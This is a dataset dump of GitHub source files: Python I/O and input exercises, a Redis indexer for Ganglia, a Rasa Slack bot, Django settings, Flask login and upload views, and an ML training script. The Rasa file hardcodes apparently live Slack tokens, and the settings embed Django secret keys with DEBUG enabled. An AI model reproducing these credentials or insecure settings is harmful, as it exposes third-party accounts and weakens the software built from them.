| blob_id (string, 40) | directory_id (string, 40) | path (string, 2-616) | content_id (string, 40) | detected_licenses (list, 0-69) | license_type (2 classes) | repo_name (string, 5-118) | snapshot_id (string, 40) | revision_id (string, 40) | branch_name (string, 4-63) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k-686M, nullable) | star_events_count (int64, 0-209k) | fork_events_count (int64, 0-110k) | gha_license_id (23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (213 classes) | src_encoding (30 classes) | language (1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 2-10.3M) | extension (246 classes) | content (string, 2-10.3M) | authors (list, 1) | author_id (string, 0-212) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
eb4e53e7a11f537c011897a2c011394c6a7ed9ad
|
402732eab2f29019ea7de7c0832474fe0564ed06
|
/com/fk/python/python_io.py
|
5982d518426954f5bdf91d21e946bf2debcf2939
|
[] |
no_license
|
abugcreater/pythondemo
|
e5236d0847fed2c8e26a40e166f16e4a26e7e459
|
0ae14a8d8203d00fcfbd97584213f07da5fb51a3
|
refs/heads/master
| 2020-06-21T02:54:36.930599
| 2019-10-22T13:06:51
| 2019-10-22T13:06:51
| 197,327,226
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,782
|
py
|
import os
# str = int(input("Please enter a number"), 10)
# print("The number you entered is greater than 10: %s" % (str > 10))
# The open() function
# You must first open a file with Python's built-in open() function and create a file object
# before the related methods can be called to read and write it.
# Syntax:
#
# file object = open(file_name [, access_mode][, buffering])
# Parameter details:
#
# file_name: a string containing the name of the file you want to access.
# access_mode: the mode the file is opened in: read-only, write, append, etc. This parameter
#   is optional; the default access mode is read-only (r).
# buffering: 0 disables buffering; 1 buffers line by line when accessing the file; an integer
#   greater than 1 gives the buffer size; a negative value uses the system default.
file = open("/Users/fengkai/Desktop/rawdata", "r+")
print("File object:", file)
# file.write("this is my house")
# Read the file by bytes
print(file.readline(10000))
print("Current position:", file.tell())
print("Continue reading:", file.readline(100))
print("Seek back to the start:", file.seek(0, 0))
print("Read from the start:", file.readline(100))
# Close the open file
file.close()
print("File mode:", file.mode)
# try/except statements
# try blocks can also be nested
try:
    fh = open("testfile", "w")
    fh.write("This is a test file, used for testing exceptions!!")
except IOError:
    print("Error: file not found or could not be read")
else:
    print("Content written to the file successfully")
finally:
    fh.close()
    print("finally executed successfully")
def _raise_():
    if 0 < 1:
        raise Exception("try exception")
_raise_()
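# A minimal sketch of the same read/write steps using a context manager (an alternative form,
# not from the original snippet): `with` closes the file automatically, so the explicit
# file.close() and the finally-block cleanup above are not needed.
#
# with open("testfile", "w") as fh:
#     fh.write("This is a test file, used for testing exceptions!!")
# with open("testfile", "r") as fh:
#     print(fh.readline(100))   # read back the first line (up to 100 characters)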
|
[
"kai.feng@qianli-inc.com"
] |
kai.feng@qianli-inc.com
|
43e6132a9bf1c0faddbb743d336f1b61965a2a6f
|
b0982b1a44e1b1043d538c33fb524cfaaf4a1bc6
|
/venc/bin/easy_install-2.7
|
e81a14a2546f1ded36da65474fdaa1e9713ccefc
|
[] |
no_license
|
vaivas/mps_database
|
f6083affe50de7a08a5167d903ae25226e6a7396
|
34aa2a64b8f9b60bd8981e17095ac2fb88ac3286
|
refs/heads/master
| 2020-06-24T11:06:58.317326
| 2017-07-28T23:19:04
| 2017-07-28T23:19:04
| 96,933,113
| 0
| 0
| null | 2017-07-11T20:11:12
| 2017-07-11T20:11:12
| null |
UTF-8
|
Python
| false
| false
| 308
|
7
|
#!/afs/slac.stanford.edu/g/lcls/vol8/epics/iocTop/users/lpiccoli/mps_database/venc/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
|
[
"lpiccoli@slac.stanford.edu"
] |
lpiccoli@slac.stanford.edu
|
ba6157a78e52d5c6410effd2ef08ae4ad0d97694
|
0ecbc8d76b9b3e4046588ae410e2594de8053a3b
|
/3lesson_5quest.py
|
595bd84b346957bc0e4ccf7416d61c90ee6783fe
|
[] |
no_license
|
EsterMiracle/Homeworks
|
5990657694b503ff1972132ef172591c369644d6
|
0f94f70067777926e7c03a6b13543fc129b419e9
|
refs/heads/main
| 2023-01-04T20:23:56.420842
| 2020-11-03T18:48:08
| 2020-11-03T18:48:08
| 303,142,460
| 0
| 0
| null | 2020-11-03T18:50:45
| 2020-10-11T14:44:21
|
Python
|
UTF-8
|
Python
| false
| false
| 1,646
|
py
|
'''5. The program asks the user for a string of numbers separated by spaces.
When Enter is pressed, the sum of the numbers should be printed.
The user can continue entering numbers separated by spaces and press Enter again.
The sum of the newly entered numbers is added to the sum already computed.
But if a special character is entered instead of a number, the program terminates.
If the special character is entered after several numbers, the sum of those numbers must first
be added to the previously obtained sum, and only then should the program terminate.'''
import sys
overall_result = 0
while True:
    ur_numbs = input("Enter numbers separated by spaces, or q to quit: ")
    tokens = ur_numbs.split(" ")
    for token in tokens:
        try:
            number = float(token)
            overall_result += number
            print(overall_result)
        except ValueError:
            if token == 'q':
                print(f"Your result: {overall_result}. Program finished.")
                exit(0)
            else:
                print(f"Your result: {overall_result}. You entered an invalid value", file=sys.stderr)
                exit(1)
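# Illustrative example session for the loop above (the input values are made up; the output
# follows the code as written, which prints the running total after every token):
#   Enter numbers separated by spaces, or q to quit: 1 2 3
#   1.0
#   3.0
#   6.0
#   Enter numbers separated by spaces, or q to quit: 4 q
#   10.0
#   Your result: 10.0. Program finished.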
|
[
"greedolife@yandex.ru"
] |
greedolife@yandex.ru
|
4c35eac75cc3aba4fadac2f1d673229090abada3
|
000ee368e4f225fe21504997b5118b599eb3c3af
|
/GangliaRest/gangliarest/build/lib/gangliarest/indexer.py
|
ed172f1660737276d65aa73e9f4fe01fa4bdd402
|
[
"MIT"
] |
permissive
|
dcarrollno/Ganglia-Modules
|
d39435d7f8cda949b0d73e1e63961ef0df0f1fb9
|
5e11313bbd3dfbdeebe79525a30e39dd8be3dd45
|
refs/heads/master
| 2020-04-12T02:26:30.543109
| 2019-03-20T14:07:51
| 2019-03-20T14:07:51
| 23,261,828
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,709
|
py
|
########################################
#
# This file is part of the gangliarest package
#
# https://pypi.python.org/pypi/gangliarest
#
# https://github.com/dcarrollno/Ganglia-Modules/wiki/GangliaRest-API:-Part-I
#
# Dave Carroll - davecarrollno@gmail.com
#
########################################
import os
import sys
import time
import redis
import read_config as cfg
from loglib import loglib
cfg.readConfig()
rootDir = cfg.rrdDir
class GangliaIndexer(object):
''' Indexer class. This class contains two methods
which are responsible for indexing operations. Indexing
the locations of Ganglia node directories into Redis speeds
up access and response time for API clients requesting metric
info. '''
# Set in /etc/GangliaRest.cfg and defines how often we index
indexer_frequency = cfg.indexFreq
index_adds = 0
def __init__(self):
''' Constructor '''
def indexer(self):
''' The indexer method is responsible for establishing
a connection to the local Redis DB, walking the Ganglia
RRD tree and indexing directory locations into Redis. We
do this so we do not need to walk the entire filesystem
looking for metric locations. '''
r = redis.Redis(
host = cfg.redisHost,
port = cfg.redisPort,
db = cfg.redisDb,
password = cfg.redisAuth)
try:
for dirName, subdirList, fileList in os.walk(rootDir):
for host in subdirList:
location = os.path.abspath(dirName+'/'+host)
if host.startswith('__SummaryInfo__'):
continue
else:
try:
#print("Adding host %s to Redis" % host)
r.setex(host,location,cfg.redisTtl)
self.index_adds +=1
stat = True
except:
print("ERROR: Error inserting host into Redis")
loglib(cfg.logfile,"ERROR: Indexer failed to index host %s" % host)
stat = False
except Exception as e:
#print("Failed to scan filesystem")
loglib(cfg.logfile,"ERROR: INDEXER failed. Error reported was %s" % e)
stat = False
return(stat) # in case we want a return status
def indexTimer(self):
''' The indexTimer method was historically responsible for managing
timed runs (deciding whether or not to run an indexing pass) but has been
deprecated and now just acts as a calling method. That dates from when
this particular class used multithreading, which it no longer does. '''
try:
#print("Running indexer on schedule")
loglib(cfg.logfile,"INFO: INDEXER starting scheduled operations...")
runner = self.indexer()
if runner:
#print("Completed indexing")
loglib(cfg.logfile,"INFO: INDEXER completed run...Added %s entries to Redis" % self.index_adds)
return()
else:
print("Indexing failed receiving a False from the indexer method.")
return()
except Exception as e:
#print("Indexing failed. Exception thrown was %s" % e)
loglib(cfg.logfile,"ERROR: INDEXER threw an error of %s" % e)
return()
if __name__ == "__main__":
cfg.readConfig()
# Debugging
#myHandle = GangliaIndexer()
#while True:
# last_run = myHandle.indexTimer()
# time.sleep(15)
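# --- Illustrative sketch (not part of the original module): how an API client might read the
# --- index that indexer() builds. It assumes the same read_config settings (redisHost, redisPort,
# --- redisDb, redisAuth) and that hosts were stored with r.setex(host, ...) as above; the
# --- hostname 'node01.example.com' is a made-up example.
#
# import redis
# import read_config as cfg
#
# def lookup_rrd_dir(hostname):
#     """Return the cached RRD directory for a Ganglia host, or None if it is not indexed."""
#     cfg.readConfig()
#     r = redis.Redis(host=cfg.redisHost, port=cfg.redisPort, db=cfg.redisDb, password=cfg.redisAuth)
#     location = r.get(hostname)          # plain GET of the key written by the indexer
#     return location.decode() if location else None
#
# # print(lookup_rrd_dir('node01.example.com'))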
|
[
"dcarroll@nanigans.com"
] |
dcarroll@nanigans.com
|
1143293eb2e633c2902266c7b3d62838e52184aa
|
4a824ea7086be98d9212a5f07ffb3d052311eed0
|
/rasa_submission_final/Rasa_basic_folder/run_app.py
|
76d31f062053973fc7c7aeffd318e1c8c23b5ab9
|
[] |
no_license
|
PriyaPathak/RASA_Chatbot
|
41b159185fd6819b237fa285eb2cbcf427cc61c5
|
16ac5b40d67f05a432c5863eb9c307f48f01b5fc
|
refs/heads/master
| 2021-03-15T08:13:31.956104
| 2020-03-12T13:06:13
| 2020-03-12T13:06:13
| 246,836,516
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 690
|
py
|
from rasa_core.channels import HttpInputChannel
from rasa_core.agent import Agent
from rasa_core.interpreter import RasaNLUInterpreter
from rasa_slack_connector import SlackInput
nlu_interpreter = RasaNLUInterpreter('./models/nlu/default/restaurantnlu')
agent = Agent.load('./models/dialogue', interpreter = nlu_interpreter)
input_channel = SlackInput('xoxp-519263176963-520205334277-522261234227-265904113cbd9bbf3e1c315e575bc00e', #app verification token
'xoxb-519263176963-522365583506-IRKqnJLjNf0xl5rhB2PVO4Kx', # bot verification token
'wHbev3FDPeZzCOfy3o8zo7Ew', # slack verification token
True)
agent.handle_channel(HttpInputChannel(5004, '/', input_channel))
|
[
"pathakpriya456@gmail.com"
] |
pathakpriya456@gmail.com
|
ca1f7b8c2b5b319566ec717d2634a96b51a56411
|
6186c88f612ccf36addde0ca52c3bbea2e9f306a
|
/rest_framework_features/test.py
|
9678c6f08ac6715cf3ec7f34da30539a043d3fea
|
[
"ISC"
] |
permissive
|
cloudcode-hungary/django-rest-framework-features
|
7d43448850c3b48dc468f023f5b6121d6c7774d4
|
9ea16ccd93ce9b5d4b4fdd92dd9ca9537ab13e80
|
refs/heads/master
| 2023-01-08T09:32:45.809633
| 2020-02-14T00:02:56
| 2020-02-14T00:02:56
| 216,915,439
| 8
| 0
|
ISC
| 2022-12-26T20:16:29
| 2019-10-22T21:46:00
|
Python
|
UTF-8
|
Python
| false
| false
| 683
|
py
|
from django.urls import NoReverseMatch
from rest_framework.test import APIClient
from . import schema, urls
class FeatureAPIClient(APIClient):
def __call__(self, feature_name, kwargs=None, **extra):
feature_schema = schema.get_schema()
try:
feature_def = feature_schema[feature_name]
except KeyError:
raise NoReverseMatch(feature_name)
else:
path = urls.substitute(feature_def['coerced_url'], kwargs or {})
method = feature_def['http_method_name']
return getattr(self, method)(
path=path,
**extra,
)
__all__ = (
'FeatureAPIClient',
)
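# Illustrative usage sketch (not part of the original module): FeatureAPIClient.__call__ looks up a
# named feature in the generated schema, substitutes URL kwargs, and dispatches the matching HTTP
# method. The feature name 'user-detail' and the kwargs below are made-up examples; they assume a
# schema entry with the 'coerced_url' and 'http_method_name' keys used above.
#
# client = FeatureAPIClient()
# response = client('user-detail', kwargs={'pk': 1})   # resolves the URL and issues e.g. a GET
# assert response.status_code in (200, 404)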
|
[
"balinabbb@gmail.com"
] |
balinabbb@gmail.com
|
477b71305f3c90033ce1f9b35f57918e94f508d5
|
e5bcfa69bafd993d29560dadc68ca0ec0ee903bd
|
/app/main/users/views.py
|
7899b3615f2c3381f09025669dc42dbf6a5e54e7
|
[] |
no_license
|
shaunstanislauslau/CuteOne
|
cc0a46fdf8614a314af8383c1a34885c88787e4f
|
77c4686a4883eae2e5f48df62936daf68558a966
|
refs/heads/master
| 2023-08-16T12:42:11.144866
| 2019-04-06T13:34:03
| 2019-04-06T13:34:03
| 179,913,149
| 0
| 0
| null | 2023-07-25T16:31:10
| 2019-04-07T03:21:07
|
CSS
|
UTF-8
|
Python
| false
| false
| 5,414
|
py
|
# -*- coding:utf-8 -*-
import time, json, random, os, hashlib
from flask import render_template, request, redirect, url_for
from flask_login import current_user
from flask_login import login_user, logout_user
from app.admin.users import models as usersModels
from app.admin.author import models as authorModels
from app import MysqlDB
from app.main import index
from ..users import logic
from app import common
import config
THEMES = 'themes/'+ config.THEMES +'/'
@index.route('/users/login', methods=['GET', 'POST']) # Login
def login():
if request.method == 'GET':
return render_template(THEMES + 'users/login.html')
else:
username = request.form['username']
password = request.form['password']
password = common.hashPwd(password)
res = usersModels.users.checkpassword(username, password, request.remote_addr)
if res["code"]:
model = usersModels.users()  # instantiate an object and copy the query result's fields onto its attributes one by one
model.id = res["msg"].id
model.username = res["msg"].username
model.avatar = res["msg"].avatar
model.nickname = res["msg"].nickname
model.score = res["msg"].score
if res["msg"].group:
model.group = authorModels.authGroup.find_by_id(res["msg"].group).title
else:
model.group = "Regular member"
login_user(model)
return json.dumps({"code": 0, "msg": "Login successful!"})
else:
return json.dumps({"code": 1, "msg": res["msg"]})
@index.route('/users/register', methods=['GET', 'POST']) # Register
def register():
username = request.form['username']
password = request.form['password']
nickname = request.form['nickname']
if len(password) < 6:
return json.dumps({"code": 1, "msg": "Invalid password format"})
password = common.hashPwd(password)
res = usersModels.users.check_username(username)
if res:
return json.dumps({"code": 1, "msg": "Username already exists"})
else:
# Initialize the role and insert it into the database
role = usersModels.users(
username = username,
password = password,
nickname = nickname,
email = '',
description = '',
avatar = "/static/uploads/avatar/{}.png".format(random.randint(1, 10)),
sex = 3,
login_num = 0,
score = 0,
group = 0,
status = 1,
register_ip = request.remote_addr,
birthday = '0001-01-01 00:00:00',
reg_time = time.strftime('%Y-%m-%d %H:%M:%S'),
update_time = time.strftime('%Y-%m-%d %H:%M:%S')
)
MysqlDB.session.add(role)
MysqlDB.session.flush()
MysqlDB.session.commit()
return json.dumps({"code": 0, "msg": "Registration successful!"})
@index.route("/users/logout")
def logout():
logout_user()
return redirect(url_for('/._index'))
@index.route('/users/users_list', methods=['GET', 'POST'])
@index.route('/users/users_list/', methods=['GET', 'POST'])
def users_list():
page_number = '1' if request.args.get('page') is None else request.args.get('page')
result = logic.get_users_list(page_number, 12)
return render_template(THEMES+'users/users_list.html', data=result)
@index.route('/users/personal/<int:id>', methods=['GET', 'POST'])
def personal(id):
result = usersModels.users.find_by_id(id)
if result.group == 0:
result.group = "Regular member"
else:
result.group = authorModels.authGroup.find_by_id(result.group).title
return render_template(THEMES+'users/personal.html', data=result)
@index.route('/users/setting', methods=['GET', 'POST'])
def setting():
if request.method == 'GET':
if current_user.get_id() is not None:
result = usersModels.users.find_by_id(current_user.id)
return render_template(THEMES + 'users/setting.html', data=result)
else:
return redirect(url_for('/._index'))
else:
if current_user.get_id() is not None:
from_data = request.form
from_data = from_data.to_dict()
from_data['id'] = current_user.id
if int(from_data['formtype']) == 1:
from_data.pop('formtype')
# whether the password is being changed
if from_data['password']:
from_data['password'] = common.hashPwd(from_data['password'])
else:
from_data.pop('password')  # password not being changed, drop the key
usersModels.users.update(from_data)
return json.dumps({"code": 0, "msg": "Done!"})
else:
return json.dumps({"code": 1, "msg": "Not logged in!"})
@index.route('/users/upload', methods=['POST'])
def upload_avatar():
if current_user.get_id() is not None:
file = request.files.get('file')
fileName = hashlib.sha1(file.read()).hexdigest()
file.seek(0)
file_path = "/app/static/uploads/avatar/{}.{}".format(fileName, file.filename.rsplit('.',1)[1])
src_path = "/static/uploads/avatar/{}.{}".format(fileName, file.filename.rsplit('.',1)[1])
file.save(os.getcwd()+file_path)
return json.dumps({"code": 0, "msg": "", "data": {"src": src_path}})
else:
return json.dumps({"code": 1, "msg": "Not logged in!"})
|
[
"hackxiaoya@gmail.com"
] |
hackxiaoya@gmail.com
|
c8f8760f1ade65ec08b7bc2ae56cab9437d0b580
|
0d7c04232f3adccf4cc9a78152b0489d54539d35
|
/monads/python/02_maybeInject.py
|
11b0ef1ab8caaed2084c535dd22cbef662295638
|
[] |
no_license
|
roschart/pruebas
|
30df0c35a4f4918f1b1cf3f91f0bb76e8939f42f
|
17f226c6bb9749d369fd90e549f797aeda632b2e
|
refs/heads/master
| 2022-09-24T13:04:38.438093
| 2022-09-14T07:17:55
| 2022-09-14T07:17:55
| 26,488,241
| 0
| 0
| null | null | null | null |
ISO-8859-13
|
Python
| false
| false
| 898
|
py
|
# -*- coding: latin-1 -*-
'''This part would be the libraries'''
def sumar(self,x):
return self.valor+x
def dividir(self,x):
return self.valor/x
'''These are the guts of the system, which only need to be written once'''
class Contexto:
def __init__(self,valor):
self.valor=valor
def __str__(self):
if (self.valor):
return "Just(%s)" % self.valor.__str__()
return "Nadita"
def lifting(fun):
def inner (*v,**k):
self=v[0]
if self.valor==None:
return Contexto(None)
try:
return Contexto(fun(*v,**k))
except:
return Contexto(None)
return inner
def injectar (clase,funciones):
for f in funciones:
setattr(clase,f.__name__,lifting(f))
injectar(Contexto,[sumar,dividir])
'''Example of how to use it'''
x=Contexto(10).sumar(2)
print (x)
x=Contexto(None).sumar(2)
print (x)
x=Contexto(10).sumar(2).dividir(3)
print (x)
x=Contexto(10).sumar(2).dividir(0)
print (x)
|
[
"joseluis.dominguez@DST-01-JLD.(none)"
] |
joseluis.dominguez@DST-01-JLD.(none)
|
d5bcab3105aafb36622225bb9a13f90e93a9205d
|
cfb8e3ab7fb8c6152dcff2be2fa2cdfae186d600
|
/LinkingLoader2021/LinkingLoader/objreader.py
|
0c1546db66ceb66c5fcdcb634ba19ab46d8e7010
|
[] |
no_license
|
Yellow-Shadow/SICXE
|
1f4ff07f3481073c180f41654f192c287aae2d09
|
8ab8579d6eb4199dd21dfca60ba6eb13fb3f2e5c
|
refs/heads/main
| 2023-08-21T23:25:56.252387
| 2021-10-10T18:57:00
| 2021-10-10T18:57:00
| 415,673,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 329
|
py
|
def readOBJFiles(sourceFile):
    try:
        with open(sourceFile, "r") as fp:
            return fp.readlines()
    except FileNotFoundError:
        print("\nError: the specified OBJ File to be read does not exist!\n")
        return None
def readRecordWithoutSpace(originalRecord):
    return originalRecord.replace(" ", "")
|
[
"noreply@github.com"
] |
Yellow-Shadow.noreply@github.com
|
dbe11ebab6a4ea395a337d7c0b95989df91bc395
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_228/ch120_2020_03_25_20_40_19_161428.py
|
58f17c36bc3c0aa31df128cbf6cb82ff40598761
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 851
|
py
|
import random
d = 100
while d > 0:
    r = random.randint(0, 36)
    print(f"Money available: {d}")
    aposta = int(input("How much do you want to bet? "))
    if aposta == 0:
        break
    elif aposta > d:
        print("You don't have enough money")
    else:
        Tipo = input("What kind of bet? Number or Parity? ")
        if Tipo == "Number":
            n = int(input("Choose a number from 0 to 36: "))
            if n == r:
                d = d + aposta * 35
            else:
                d = d - aposta
        if Tipo == "Parity":
            p = input("Even or Odd? ")
            if r % 2 == 0:
                r = "Even"
            else:
                r = "Odd"
            if r == p:
                d = d + aposta
            else:
                d = d - aposta
|
[
"you@example.com"
] |
you@example.com
|
b4523882013a8e47a58bc3d651a935a84aa35df5
|
09fbaaa2ec2daa1eca9587e31e0e4e37ed0186a4
|
/LanwellManagementSystem/settings_production.py
|
77c94bedc4dbb3b1514aab8a4f8d097dd3633d5a
|
[] |
no_license
|
agriev/LanwellManagementSystem
|
aec4a39e4197f7bcb1fce4fdaee20faad6cb8269
|
1a6718915f82f4c765d69596f2b48fae2a922ffd
|
refs/heads/master
| 2016-09-06T14:43:07.993751
| 2014-11-17T18:42:57
| 2014-11-17T18:42:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,482
|
py
|
"""
Django settings for LanwellManagementSystem project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'uwik+1+fugk*eor@w@x(rh733eu!--5z8fcytp92)=(=**8x$b'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'LDMSystemMain',
'django.contrib.webdesign',
'bootstrap3',
'simplejson',
'django_tables2',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'LanwellManagementSystem.urls'
WSGI_APPLICATION = 'LanwellManagementSystem.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
TEMPLATE_CONTEXT_PROCESSORS = ("django.core.context_processors.request",
"django.contrib.auth.context_processors.auth",)
|
[
"anton@griev.ru"
] |
anton@griev.ru
|
fb09c038b749af37dffc53735ea4b6ba7e470ac5
|
0191e79206a35d58ae65e6dc954f8f356ee50a34
|
/demosite/demosite/settings.py
|
525f5d176dd6be9dac09db0bd8e9c13875b71de0
|
[] |
no_license
|
slidemoon/gdemo
|
7b8f391e990f41b53da9ac1803059fc4b235681f
|
e434b6982b4d2601a97f631a379fd2324c37dd2b
|
refs/heads/master
| 2020-12-30T16:14:53.882070
| 2017-07-08T02:53:56
| 2017-07-08T02:53:56
| 90,966,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,205
|
py
|
"""
Django settings for demosite project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'nuujy#xwanwmrs92myn24w8d)5uwu+6xsox371cbvhq!%b235@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'gdemo.apps.GdemoConfig'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'demosite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'demosite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
# Session Engine
SESSION_ENGINE = 'django.contrib.sessions.backends.file'
|
[
"yi.shen@arkdesign.cn"
] |
yi.shen@arkdesign.cn
|
064ba7c69bb9cf2e2a708ac3bc57ddd442273699
|
5cdf48eaa413b5211319a9bced6ede6f689b15ed
|
/10/RandomForest/11.SaveCorrectModel.py
|
831308bd778de01865bcf92a5b8abbbbd1add83b
|
[] |
no_license
|
akshitasawhney3008/MTech-thesis
|
518177b8bcb3112c9e1470af89df0250d00503dd
|
f9e9d3481b2fa5b3e8ac7a2d1e180656542e1156
|
refs/heads/master
| 2021-06-28T00:57:34.685127
| 2020-12-09T08:56:33
| 2020-12-09T08:56:33
| 189,271,644
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,098
|
py
|
import pickle
from sklearn.preprocessing import normalize
from sklearn.ensemble import RandomForestClassifier
import numpy as np
iter = 5
seed = 42
with open('ListOfBestParamsRS.pkl', 'rb') as f:
best_params = pickle.load(f)
path = "C://Users//Arushi//PycharmProjects//Final_Thesis_chap1//9//"
for i in range(iter):
X_train = np.load(path + 'transformed_train_data_' + str(i) + '.npy')
Y_train = np.load(path + 'transformed_train_labels_' + str(i) + '.npy')
X_train = X_train.astype('float')
X_train = normalize(X_train)
Y_train = Y_train.astype('float')
Y_train = Y_train.astype(int)
bp = best_params[i]
clf = RandomForestClassifier(n_estimators=bp['n_estimators'], bootstrap=bp['bootstrap'], max_depth=bp['max_depth'],
max_features=bp['max_features'], min_samples_leaf=bp['min_samples_leaf'],
min_samples_split=bp['min_samples_split']).fit(X_train, Y_train.ravel())
with open('Model_rf' + str(i) + '.pkl', 'wb') as f:
pickle.dump(clf, f)
|
[
"noreply@github.com"
] |
akshitasawhney3008.noreply@github.com
|
6b380419b28d072dd1c3ffd968329845932e9826
|
91efdcf621fbf8083c3a5ae9561e15e1c526979d
|
/doms/domsapp/urls.py
|
81ef9ce1342b45d297f7b6a2816b48d6467845a6
|
[] |
no_license
|
bigyanghimire/Namobuddha
|
60416f3a40b3cd97131c34be85a4354ca6a2edf8
|
43cd041e82816ea11ef57f8dcfabd91f1fabdc76
|
refs/heads/master
| 2022-12-03T16:39:44.667578
| 2018-07-22T16:31:38
| 2018-07-22T16:31:38
| 139,167,575
| 0
| 1
| null | 2022-11-28T07:28:27
| 2018-06-29T15:40:45
|
Python
|
UTF-8
|
Python
| false
| false
| 455
|
py
|
from django.conf.urls import url,include
from . import views
from django.conf.urls.static import static
from django.conf import settings
urlpatterns=[
url(r'^$',views.index,name="index"),
url(r'^search/$',views.search,name="search"),
url(r'^searchdate/$',views.searchdate,name="searchdate"),
url(r'^addfile/$',views.addfile,name="addfile"),
url(r'^delete-entry/(?P<pk>\d+)$', views.DeleteView, name='delete_view'),
#url(r'^add/$',views.add,name="add"),
]
|
[
"ghimire.vigyan@gmail.com"
] |
ghimire.vigyan@gmail.com
|
a0d82258e312cec6ebff69f1080a1a3014c5bd2f
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/htpi99zeTsvjWNujz_11.py
|
